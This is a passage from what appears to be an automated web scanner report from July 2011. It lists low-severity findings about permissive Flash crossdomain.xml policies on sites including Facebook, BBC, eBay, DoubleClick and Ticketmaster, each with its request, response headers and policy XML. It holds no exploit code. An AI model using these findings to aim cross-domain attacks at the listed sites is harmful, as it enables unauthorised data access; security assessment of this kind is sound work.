   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.63. http://edge.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Thu, 14 Jul 2011 20:29:31 GMT
Accept-Ranges: bytes
Date: Tue, 19 Jul 2011 14:26:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.64. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=110
Expires: Tue, 19 Jul 2011 14:27:01 GMT
Date: Tue, 19 Jul 2011 14:25:11 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.65. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 18 Jul 2011 22:46:43 GMT
Expires: Tue, 19 Jul 2011 22:46:43 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49041
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.66. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Tue, 19 Jul 2011 14:27:08 GMT
Date: Tue, 19 Jul 2011 14:25:10 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.67. http://rover.ebay.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:35:48 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.68. http://srx.main.ebayrtm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://srx.main.ebayrtm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: srx.main.ebayrtm.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:36:19 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.69. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.145.196
X-Cnection: close
Date: Tue, 19 Jul 2011 18:37:21 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.70. http://wd.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 14:28:23 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Thu, 14 Jul 2011 20:29:31 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.71. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: _e_FxZX_6=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.63.23.51
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.72. http://www.myspace.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 14 Jul 2011 20:16:10 GMT
Accept-Ranges: bytes
ETag: "0a1dade6242cc1:0"
Server: Microsoft-IIS/7.5
X-Server: 3fa02f8c17d84938b9f7badb240f47c049a93c0d0fb9823f
X-PoweredBy: The fire of 1,000 SUNS!
Date: Tue, 19 Jul 2011 14:28:33 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

5.73. http://www.res-x.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 16:04:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

5.74. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Tue, 19 Jul 2011 14:28:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

5.75. http://www.ticketmaster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Vary: Cookie
Last-Modified: Mon, 06 Jun 2011 17:11:27 GMT
ETag: "4c3-3197cdc0"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.com" />
...[SNIP]...
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...

5.76. http://boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:33 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: seanburns
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=7;expires=Wed, 22-Jun-2016 20:43:33 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />

...[SNIP]...
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

5.77. http://cache.boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:23:53 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Content-Type: application/xml
